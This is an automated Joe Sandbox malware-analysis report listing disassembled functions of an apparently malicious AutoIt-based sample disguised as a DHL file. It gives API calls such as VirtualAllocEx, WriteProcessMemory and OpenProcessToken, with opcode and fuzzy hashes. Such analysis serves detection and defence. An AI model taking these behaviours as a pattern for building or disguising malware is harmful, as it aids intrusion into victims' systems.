                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3277943733-0
                                                                                        • Opcode ID: a187a63ff3559a4b3bd57d287936019c5dab0c2005d1aee01c2bf4947dd6d993
                                                                                        • Instruction ID: 9b3833f867b7b9a881e7edf69236cbbe2b67c66a7465a01a27999e2ce00949ae
                                                                                        • Opcode Fuzzy Hash: a187a63ff3559a4b3bd57d287936019c5dab0c2005d1aee01c2bf4947dd6d993
                                                                                        • Instruction Fuzzy Hash: EEF05EF25403107AE61027A1FD06FBF3A9CEB08395F004028FA08E51A2D7719C01C7AC
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00C66BE6
                                                                                          • Part of subcall function 00C676C4: _memset.LIBCMT ref: 00C676F9
                                                                                        • _memmove.LIBCMT ref: 00C66C09
                                                                                        • _memset.LIBCMT ref: 00C66C16
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00C66C26
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 48991266-0
                                                                                        • Opcode ID: d1d70402f50e1a9d704afe76dcfe82d02d573c4aa9671d72f4f87a974abaf360
                                                                                        • Instruction ID: 160668234abc4bc245e05e40865848d413e3887afe0a2428fcc51b18ab47f1e9
                                                                                        • Opcode Fuzzy Hash: d1d70402f50e1a9d704afe76dcfe82d02d573c4aa9671d72f4f87a974abaf360
                                                                                        • Instruction Fuzzy Hash: 1CF05E3A200110BBCF016F55EC85B8ABB29EF45320F188065FE085E227D775E811DBB4
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000008), ref: 00C02231
                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00C0223B
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00C02250
                                                                                        • GetStockObject.GDI32(00000005), ref: 00C02258
                                                                                        • GetWindowDC.USER32(?,00000000), ref: 00C3BE83
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C3BE90
                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00C3BEA9
                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 00C3BEC2
                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00C3BEE2
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00C3BEED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1946975507-0
                                                                                        • Opcode ID: 262fb6ada92d9477e1416efbeae5e7c4457e89846378b8166881f8e60ba7d602
                                                                                        • Instruction ID: 903d56e019d085e4cc57dbd21f714a0c045442e25c3a7a6f92dab7af4f3ea080
                                                                                        • Opcode Fuzzy Hash: 262fb6ada92d9477e1416efbeae5e7c4457e89846378b8166881f8e60ba7d602
                                                                                        • Instruction Fuzzy Hash: D8E03932104244EADB215FA8EC4D7DC3B20EB05332F10836AFA79480E187B14A91DB12
                                                                                        APIs
                                                                                        • GetCurrentThread.KERNEL32 ref: 00C5871B
                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C582E6), ref: 00C58722
                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C582E6), ref: 00C5872F
                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C582E6), ref: 00C58736
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                        • String ID:
                                                                                        • API String ID: 3974789173-0
                                                                                        • Opcode ID: fe5587900907cfc94426a7e700f332de14fac3d5bd6f633ac1821d37d00c4e36
                                                                                        • Instruction ID: 5f2427693dc8c18bbbfafd008061a1c83b42f4ce441781ee98e26302e2d02c30
                                                                                        • Opcode Fuzzy Hash: fe5587900907cfc94426a7e700f332de14fac3d5bd6f633ac1821d37d00c4e36
                                                                                        • Instruction Fuzzy Hash: 8DE086366113119FD7205FB05D0CB5E3BACEF547D2F24482CB645DA050DB74848AC754
                                                                                        APIs
                                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 00C5B4BE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContainedObject
                                                                                        • String ID: AutoIt3GUI$Container
                                                                                        • API String ID: 3565006973-3941886329
                                                                                        • Opcode ID: 1ce77e3222890373671540e7516e8be303ca80bf89da43a02873645398b6ab6e
                                                                                        • Instruction ID: cf728d597cbebf1a1e2d0a8b5ac763199ac236ed57a2bd5173148680627c78af
                                                                                        • Opcode Fuzzy Hash: 1ce77e3222890373671540e7516e8be303ca80bf89da43a02873645398b6ab6e
                                                                                        • Instruction Fuzzy Hash: A8914874200601AFDB14CF64C884B6ABBE5FF49711F20856DED4ACB6A1EB70ED85CB54
                                                                                        APIs
                                                                                          • Part of subcall function 00C1FC86: _wcscpy.LIBCMT ref: 00C1FCA9
                                                                                          • Part of subcall function 00C09837: __itow.LIBCMT ref: 00C09862
                                                                                          • Part of subcall function 00C09837: __swprintf.LIBCMT ref: 00C098AC
                                                                                        • __wcsnicmp.LIBCMT ref: 00C6B02D
                                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00C6B0F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                        • String ID: LPT
                                                                                        • API String ID: 3222508074-1350329615
                                                                                        • Opcode ID: 438281edce62de9963102e7e19b0c3ea6c2df425d9cacd8b3708935ee22b4de3
                                                                                        • Instruction ID: 1bd28589ce3cd772c93e4ebf8e89cdbdd27583e05543086edf544c2e9bc6f471
                                                                                        • Opcode Fuzzy Hash: 438281edce62de9963102e7e19b0c3ea6c2df425d9cacd8b3708935ee22b4de3
                                                                                        • Instruction Fuzzy Hash: 6B6193B5A00219EFCB24DF94C891EAEB7B4EF09310F108169F916EB391D770AE84DB50
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000), ref: 00C12968
                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C12981
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                        • String ID: @
                                                                                        • API String ID: 2783356886-2766056989
                                                                                        • Opcode ID: ba43872546f2d9385e4a85aec51795b4c5e5b2d80664374491e653e5744f8a17
                                                                                        • Instruction ID: c981b0174185c414d012b25c8aeb858f9653b2fd48104da86b97f7aa64a63aef
                                                                                        • Opcode Fuzzy Hash: ba43872546f2d9385e4a85aec51795b4c5e5b2d80664374491e653e5744f8a17
                                                                                        • Instruction Fuzzy Hash: A9515672408B449BD320EF24D886BAFBBE8FF85344F41885DF2D8411A2DB708529DB66
                                                                                        APIs
                                                                                          • Part of subcall function 00C04F0B: __fread_nolock.LIBCMT ref: 00C04F29
                                                                                        • _wcscmp.LIBCMT ref: 00C69824
                                                                                        • _wcscmp.LIBCMT ref: 00C69837
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscmp$__fread_nolock
                                                                                        • String ID: FILE
                                                                                        • API String ID: 4029003684-3121273764
                                                                                        • Opcode ID: fc165b455a49cc3347dccf429817f4fc21ff4994b84b10eab39f7ead1050655c
                                                                                        • Instruction ID: 964cea3e99b71dd4217d7bc5efed8df4b1cd1d627c18a02ff7c04dc300782d66
                                                                                        • Opcode Fuzzy Hash: fc165b455a49cc3347dccf429817f4fc21ff4994b84b10eab39f7ead1050655c
                                                                                        • Instruction Fuzzy Hash: 8641A571A0021ABADF249AE5CC85FEFB7BDDF89710F000469FA04A71C1DA71AA04DB61
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C7259E
                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C725D4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CrackInternet_memset
                                                                                        • String ID: |
                                                                                        • API String ID: 1413715105-2343686810
                                                                                        • Opcode ID: 92c069501446c113bde6b73f3703bbb0408d8f8b2e71e560954736fbd6d4071d
                                                                                        • Instruction ID: 287e8cc8900191708c17b1ae270d48622161d816f8f9ee6312cf3f05b8e315a0
                                                                                        • Opcode Fuzzy Hash: 92c069501446c113bde6b73f3703bbb0408d8f8b2e71e560954736fbd6d4071d
                                                                                        • Instruction Fuzzy Hash: 8D314871D00119ABCF15EFA5CC85EEEBFB8FF08340F10415AF918A6162EB315A56EB60
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00C87B61
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C87B76
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: '
                                                                                        • API String ID: 3850602802-1997036262
                                                                                        • Opcode ID: 59030e17e7620bc4eec9a0e243d324111db797d9ba1644f53c9d513d155e1d7d
                                                                                        • Instruction ID: 9aa7b0cf6e4d00965019a3cc9ee8228d5772cfc5c4ac00f18e4545181da95390
                                                                                        • Opcode Fuzzy Hash: 59030e17e7620bc4eec9a0e243d324111db797d9ba1644f53c9d513d155e1d7d
                                                                                        • Instruction Fuzzy Hash: F4412A74A042099FDB14DF65C980BEEBBB5FB08304F20026AE914EB391E770AA51DF94
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00C86B17
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C86B53
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$DestroyMove
                                                                                        • String ID: static
                                                                                        • API String ID: 2139405536-2160076837
                                                                                        • Opcode ID: a095c4aeae79f1f8091aa419ec5435a0b0905ae1e00e61629ea9e6bf0e62daf3
                                                                                        • Instruction ID: 1c3433267bd352131550a5554eb64391fc86fe3f2904f0d12c5992eb75b56e70
                                                                                        • Opcode Fuzzy Hash: a095c4aeae79f1f8091aa419ec5435a0b0905ae1e00e61629ea9e6bf0e62daf3
                                                                                        • Instruction Fuzzy Hash: BD316D71200604AEDB10AF64CC81BFB77A9FF48768F108629F9A9D7190DB31AD91E764
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00C59965
                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00C5999F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3850602802-2594219639
                                                                                        • Opcode ID: 63d7a47877fba214ad9ed3eef848a5c2a6cdaa31ca4f64b5d015d6a848097b56
                                                                                        • Instruction ID: 959a8f38f46e4bfc3954fe30305b402808c1878d7dbd214fba95b03ff4a36ac3
                                                                                        • Opcode Fuzzy Hash: 63d7a47877fba214ad9ed3eef848a5c2a6cdaa31ca4f64b5d015d6a848097b56
                                                                                        • Instruction Fuzzy Hash: D2210636D00215EBCF14EBA8C881DBEB779EF88711F1041ADFD15A7290EA31AD86D764
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C62911
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C6294C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoItemMenu_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 2223754486-4108050209
                                                                                        • Opcode ID: 381be61a803a9ef107e051b49b75639ec976205ef8dd37a24f6032b57624c612
                                                                                        • Instruction ID: cd65b664cab245a4c9d65a39a286f79f127bed1083998f463691c34ebb795450
                                                                                        • Opcode Fuzzy Hash: 381be61a803a9ef107e051b49b75639ec976205ef8dd37a24f6032b57624c612
                                                                                        • Instruction Fuzzy Hash: E031E431A00705AFEB34DF58DCC5BAEBBF8EF85350F180029E995A61A1DB709A40DB51
                                                                                        APIs
                                                                                        • __snwprintf.LIBCMT ref: 00C73A66
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __snwprintf_memmove
                                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                        • API String ID: 3506404897-2584243854
                                                                                        • Opcode ID: 71ac612fcebdc21d5282944234e07139027be40717a2f05506cb2f10c3452106
                                                                                        • Instruction ID: 55294ba3f8adeab2a296f100a8efddb9c9ac452d41302fef1e0ecb4189e90b43
                                                                                        • Opcode Fuzzy Hash: 71ac612fcebdc21d5282944234e07139027be40717a2f05506cb2f10c3452106
                                                                                        • Instruction Fuzzy Hash: 40219171A00219AFCF14EFA4CC82AAE77B9AF44710F404464F859A71C1DB30EA46EB65
                                                                                        APIs
                                                                                          • Part of subcall function 00C1603A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C16051
                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C5AA10
                                                                                        • _strlen.LIBCMT ref: 00C5AA1B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Timeout_strlen
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 2777139624-2594219639
                                                                                        • Opcode ID: 72fbd64ca358f2d3c4033e37d9eee6904c25ffd9ce2a4ff4d90a9ecd0707bf01
                                                                                        • Instruction ID: 641f105b80484ff7c943839bcb53d2f30f7747680c98ae1c617ce3d42c1c30e8
                                                                                        • Opcode Fuzzy Hash: 72fbd64ca358f2d3c4033e37d9eee6904c25ffd9ce2a4ff4d90a9ecd0707bf01
                                                                                        • Instruction Fuzzy Hash: 2E115B366001056BCF146E7ADDC29BE7B688F09301F10012EFD06CB193DD2499CAFA69
                                                                                        APIs
                                                                                          • Part of subcall function 00C655FD: GetLocalTime.KERNEL32 ref: 00C6560A
                                                                                          • Part of subcall function 00C655FD: _wcsncpy.LIBCMT ref: 00C6563F
                                                                                          • Part of subcall function 00C655FD: _wcsncpy.LIBCMT ref: 00C65671
                                                                                          • Part of subcall function 00C655FD: _wcsncpy.LIBCMT ref: 00C656A4
                                                                                          • Part of subcall function 00C655FD: _wcsncpy.LIBCMT ref: 00C656E6
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C868FF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsncpy$LocalMessageSendTime
                                                                                        • String ID: @U=u$SysDateTimePick32
                                                                                        • API String ID: 2466184910-2530228043
                                                                                        • Opcode ID: 667b88d5092d27dfea66021954ee36829b4f1152f82938e1141c5c869cd5ad85
                                                                                        • Instruction ID: b50df300bfe0f18fcdfe810504e03b9b1fc8b0933a1630497bc61bda8d0acb62
                                                                                        • Opcode Fuzzy Hash: 667b88d5092d27dfea66021954ee36829b4f1152f82938e1141c5c869cd5ad85
                                                                                        • Instruction Fuzzy Hash: A82129713402186FEF21AE14DC82FEE736AEB44754F200529FD54AB1D0D6B1AD809764
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C5923E
                                                                                          • Part of subcall function 00C613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00C61409
                                                                                          • Part of subcall function 00C613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C5925A,00000034,?,?,00001004,00000000,00000000), ref: 00C61419
                                                                                          • Part of subcall function 00C613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C5925A,00000034,?,?,00001004,00000000,00000000), ref: 00C6142F
                                                                                          • Part of subcall function 00C614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C59296,?,?,00000034,00000800,?,00000034), ref: 00C614E6
                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00C592A5
                                                                                          • Part of subcall function 00C61487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00C614B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
